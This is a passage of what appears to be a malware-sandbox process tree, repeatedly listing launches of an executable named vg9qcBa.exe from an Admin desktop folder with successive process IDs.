      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10216
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10224
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10232
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:3504
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9936
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9908
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10248
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10256
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10264
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10272
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10280
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10288
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10296
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10304
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10312
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10320
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10328
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10336
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10344
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10352
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10360
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10368
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10376
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10420
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10428
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10436
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10444
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10452
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10460
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10468
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10476
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10484
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10492
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10500
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10508
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10516
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10524
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10532
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10540
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10548
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10556
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10564
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10572
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10580
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10588
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10596
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10604
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10612
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10620
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10628
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10636
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10644
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10652
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10660
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10668
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10676
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10684
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10692
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10700
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10708
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10716
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10724
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10732
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10740
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10748
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10756
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10764
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10772
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10780
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10788
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10796
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10804
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10812
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10820
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10828
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10836
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10844
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10852
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10860
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10868
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10876
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10884
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10892
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10900
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10908
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10916
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10924
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10932
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10940
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10948
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10956
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10964
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10972
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10980
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10988
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10996
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11004
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11012
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11020
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11028
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11036
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11044
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11052
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11060
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11068
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11076
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11084
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11092
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11100
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11108
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11116
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11124
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11132
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11140
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11148
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11156
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11200
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11208
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11216
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11224
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11240
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11248
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11260
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6964
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6636
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6572
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:5236
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:5924
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:5172
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6204
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6324
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11272
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11280
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11288
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11296
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11308
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11320
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11336
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11344
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11352
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11360
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11368
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11376
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11384
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11392
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11400
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11408
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11416
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11424
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11432
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11440
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11448
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11456
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11464
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11472
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11480
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11488
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11496
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11504
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11512
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11520
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11528
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11536
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11544
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11552
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11560
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11568
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11576
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11584
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11592
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11600
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11608
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11616
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11624
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11632
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11640
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11648
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11656
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11664
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11672
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11680
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11688
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11696
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11704
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11712
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11720
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11728
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11736
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11744
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11752
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11760
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11768
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11776
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11784
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11792
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11800
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11808
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11816
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11824
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:11832
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
